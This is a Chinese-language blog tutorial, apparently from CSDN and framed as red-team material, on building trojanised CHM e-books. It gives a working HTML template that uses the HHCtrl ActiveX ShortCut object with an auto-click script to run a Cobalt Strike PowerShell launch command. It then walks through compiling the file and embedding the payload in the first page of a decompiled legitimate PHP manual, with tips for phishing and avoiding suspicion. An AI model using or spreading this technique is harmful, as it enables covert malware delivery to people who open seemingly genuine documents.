[红队apt]CHM电子书攻击/电子教程攻击

免责声明:本文用于了解攻击者的攻击手法，切勿用于不法用途

前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

本文主要整理当初电子书的时代，利用电子书攻击的操作

CHM电子书简介

这个在当初普遍用于做教程课件，软件说明等应用。

现在这个用的少了，但是依旧还是有些使用用途。

下面是php的chm教程

这个用来钓鱼还是不错的。

但是一般咱得找点模版，在人家基础上进行编辑。

不然莫名其妙一个奇怪chm太容易被怀疑了。

这个东西其实就是跟网页一样，用h5做的。

制作基础CHM木马

上线模板如下

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",填入生成的PS上线命令">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

CS生成web投递指令

填好内容

点运行

复制下面的指令

然后去掉这个命令中的双引号，并且在exe后面加个，

之后复制到模板的指定位置

然后用easy chm去制作chm电子书

创建一个项目，把这个html文件添加进去

完成之后点编译

生成木马，chm文件在对应目录的上一个目录

但是这样打开一个啥也没有的chm确实很可疑。

所以我们往往会选择一个正统的chm文本做嵌入。

高级版CHM木马

找一个真正有用的chm文件

这次我们使用这个php文档作为嵌入

这个是成品，我们需要先给他反编译过来。

反编译掉他

插入攻击代码，保存一下。

然后打开即可。

尽量在首页插入，不然他不浏览可能不会中招。

当然从社工角度也可以往后面插，因为一打开提示安全问题也比较怀疑。